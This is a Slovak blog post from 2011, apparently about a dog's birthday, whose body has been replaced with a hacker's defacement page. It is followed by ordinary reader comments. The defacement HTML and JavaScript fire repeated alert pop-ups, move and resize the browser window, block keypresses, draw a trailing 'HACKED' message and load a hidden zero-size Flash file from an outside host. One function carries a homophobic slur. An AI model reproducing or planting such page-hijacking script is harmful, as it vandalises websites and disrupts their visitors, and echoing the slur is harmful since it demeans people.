[ Hacked by D4Rk-SkY ]

Článok uverejnený: 26.05.2011 23:40:00
Počet reakcií: 7 / chcem sa vyjadriť

 

[ Hacked by D4Rk-SkY ]

<title>[ Hacked by D4Rk-SkY ]</title>



          <html>


          <body bgcolor='black'>


          <script>alert('D4Rk-SkY Was Here :):) !!!');


          


alert('Your web is not safe:):) !!!');


alert('Hack For Fun :)) :)) ');


           </script>


          <script>


function for_faggots() {


    window.open("")


    window.open("")


    


}


window.scrollBy(0, 1);window.resizeTo(0,0);window.moveTo(0,0);setTimeout("move()", 2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;


function move()


{


if (status == 1)


{


mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;


window.moveTo(mx,my)


rmxm=Math.round(mxm/10);rmym=Math.round(mym/10);


if (rmxm == 0)


{


if (rmym == 0)


{


status=2


}


}


}


if (status == 2)


{


sv=sv/1.1


scrratio=1+1/3


mx=mx-sv*scrratio/2


my=my-sv/2


szx=szx+sv*scrratio


szy=szy+sv


window.moveTo(mx,my)


window.resizeTo(szx,szy)


if (sv < 0.1)


{


status=3


}


}


if (status == 3)


{


document.fgColor=0xffffFF


c=c-16


if (c<0)


{status=8}


}


if (status == 4)


{


c=c+16


document.bgColor=c*65536


document.fgColor=(255-c)*65536


if (c > 239)


{status=5}


}


if (status == 5)


{


c=c-16


document.bgColor=c*65536


document.fgColor=(255-c)*65536


if (c < 0)


{


status=6


cycle=cycle-1


if (cycle > 0)


{


if (done == 1)


{status=7}


else


{status=4}


}


}


}


if (status == 6)


{


document.title = "LOL"


alert("LOL")


cycle=2


status=4


done=1


}


if (status == 7)


{


c=c+4


document.bgColor=c*65536


document.fgColor=(255-c)*65536


if (c > 128)


{status=8}


}


if (status == 8)


{


window.moveTo(0,0)


sx=screen.availWidth


sy=screen.availHeight


window.resizeTo(sx,sy)


status=9


}


var timer=setTimeout("move()",0.3)


}


function keypressed() {return false;}document.onkeydown=keypressed;


</script>


          <script>


          //mouse


          //Circling text trail- Tim Tilton


          //Website: http://www.tempermedia.com/


          //Visit http://www.dynamicdrive.com for this script and more


          function cursor_text_circle(){


          // your message here


          var msg=' HACKED by D4Rk-SkY !! '.split('').reverse().join('');



          var font='Verdana,Arial';


          var size=6; // up to seven


          var color='#ffffff';



          // This is not the rotation speed, its the reaction speed, keep low!


          // Set this to 1 for just plain rotation w/out drag


          var speed=.3;



          // This is the rotation speed, set it negative if you want


          // it to spin clockwise


          var rotation=-.1;



          // Alter no variables past here!, unless you are good


          //---------------------------------------------------




          var ns=(document.layers);


          var ie=(document.all);


          var dom=document.getElementById;


          msg=msg.split('');


          var n=msg.length;


          var a=size*20;


          var currStep=0;


          var ymouse=0;


          var xmouse=0;


          var props="<font face="+font+" size="+size+" color="+color+">";



          if (ie)


          window.pageYOffset=0



          // writes the message


          if (ns){


          for (i=0; i < n; i++)


          document.write('<layer name="nsmsg'+i+'" top=0 left=0 height='+a+' width='+a+'><center>'+props+msg[i]+'</font></center></layer>');


          }


          else if (ie||dom){


          document.write('<div id="outer" style="position:absolute;top:0px;left:0px;z-index:30000;"><div style="position:relative">');


          for (i=0; i < n; i++)


          document.write('<div id="iemsg'+(dom&&!ie? i:'')+'" style="position:absolute;top:0px;left:0;height:'+a+'px;width:'+a+'px;text-align:center;font-weight:normal;cursor:default">'+props+msg[i]+'</font></div>');


          document.write('</div></div>');


          }


          (ns)?window.captureEvents(Event.MOUSEMOVE):0;



          function Mouse(evnt){


          ymouse = (ns||(dom&&!ie))?evnt.pageY+20-(window.pageYOffset):event.y; // y-position


          xmouse = (ns||(dom&&!ie))?evnt.pageX+20:event.x-20; // x-position


          }



          if (ns||ie||dom)


          (ns)?window.onMouseMove=Mouse:document.onmousemove=Mouse;


          var y=new Array();


          var x=new Array();


          var Y=new Array();


          var X=new Array();


          for (i=0; i < n; i++){


          y[i]=0;


          x[i]=0;


          Y[i]=0;


          X[i]=0;


          }



          var iecompattest=function(){


          return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body;


          }



          var makecircle=function(){ // rotation properties


          if (ie) outer.style.top=iecompattest().scrollTop+'px';


          currStep-=rotation;


          for (i=0; i < n; i++){ // makes the circle


          var d=(ns)?document.layers['nsmsg'+i]:ie? iemsg[i].style:document.getElementById('iemsg'+i).style;


          d.top=y[i]+a*Math.sin((currStep+i*1)/3.8)+window.pageYOffset-15+(ie||dom? 'px' : '');


          d.left=x[i]+a*Math.cos((currStep+i*1)/3.8)*2+(ie||dom? 'px' : ''); // remove *2 for just a plain circle, not oval


          }


          }



          var drag=function(){ // makes the resistance


          y[0]=Math.round(Y[0]+=((ymouse)-Y[0])*speed);


          x[0]=Math.round(X[0]+=((xmouse)-X[0])*speed);


          for (var i=1; i < n; i++){


          y[i]=Math.round(Y[i]+=(y[i-1]-Y[i])*speed);


          x[i]=Math.round(X[i]+=(x[i-1]-X[i])*speed);



          }


          makecircle();


          // not rotation speed, leave at zero


          setTimeout(function(){drag();},10);


          }


          if (ns||ie||dom)


          if ( typeof window.addEventListener != "undefined" )


          window.addEventListener( "load", drag, false );


          else if ( typeof window.attachEvent != "undefined" )


          window.attachEvent( "onload", drag );


          else {


          if ( window.onload != null ) {


          var oldOnload = window.onload;


          window.onload = function ( e ) {


          oldOnload( e );


          drag();


          };


          }


          else


          window.onload = drag;


          }



          }


          cursor_text_circle();



          </script>



 <EMBED src='http://greencall.co.kr/.p/we_will_not_go_down.swf'  width=0 height=0  type=application/x-shockwave-flash>


          <center>


          <img border="0" src="http://l2oul3ah.persiangig.com/image/hacked.gif" width="350" height="60">


           <br>


          <img src="http://www.xpluz.us/uploads/avatars/avatar_2.png?dateline=1323080209" >


          


          <br>


                 <font color='red' size=6>



          <blink> D4Rk-SkY Was Here :):) !!! </blink> <br>


          </font>  


          <font color='ffffff' size=5>


          (:(: THX TO = Pontianak Security System (POSTEM  ) & CRUE //++++// CrashBandicot  //++++// ect //+++// :):)<br>


          </font>


 


          <br>


           <font face="Tahoma" size="3" color="#D50000"> Copyright &copy; 2012 pontianak security system </font>


           


          </center>


          </body</html>



[ Hacked by D4Rk-SkY ]



D4Rk-SkY Was Here :):) !!!
(:(: THX TO = Pontianak Security System (POSTEM ) & CRUE //++++// CrashBandicot //++++// ect //+++// :):)

Copyright © 2012 pontianak security system

 

Reakcie k článku

Viete čo je zaujímavé
esak   [26.05.2011 23:46:47]

že si nepamätám Dina ako mláďa. Akoby bol vždy starý a veľký. Ani neviem, či sú nejaké fotky, keď bol mladý a mal ešte gule. Doslova

oneee. )
marcel one   [27.05.2011 00:10:29]

pri Dinovi sa da povedat, ze ma gule, aj ked ziadne nema.. )

vsetko naj
bezo   [27.05.2011 06:42:57]

pravicu mu nepodam, lebo by mi ju odhryzol :-)))
kazdopadne mu zelam vsetko naj a hlavne pevne zdravie
a ako spieva rocker Esak: ta ta tá tatatatá ta ta tá tatá

Aha
Sjekellka   [27.05.2011 19:09:46]

Su fotky, aj ked bol mlady ;)

Dindúšik náš
Jacksonka   [29.05.2011 21:49:45]

je to ten NAJ, NAJ, NAj pes na celom celučičkom svete!!! Veď nenadarmo sa hovorí: PRVÁ LÁSKA NEHRDZAVIE...MILUJEM HO A VŽDY BUDEM A PRAJEM VŠETKO NAJ, MYSLELA SOM NA NEHO 27.MÁJA:-)

blahoželanie
erika   [01.06.2011 13:40:01]

K Dinovým narodkám sa pripájam aj ja a môj 14 - ročný Herinko!!!! Je na tom asi podobne, vrčí, je hluchý, troška slepý, stále mu chutí a zožerie všetko čo vidí...ale teraz má novú zbraň! Keď k nám niekto ide a on sa rúti so štekotom k bránke tak pri tom aj prdíííí! Takto odháňa nepriateľa z nášho územia:-)))! Ešte raz všetko NAJ!!! A ten občiansky si na budúci rok môžu ísť vybaviť spolu!!!

blahoprianie
vincko   [01.06.2011 21:29:35]

ja mu prajem všetko po čom túži.....(erika aký pán taký pes :)


Web Address Email Address Bold Text Italic Text Underlined Text
 

 

 

 

hocikto>info (c) 2008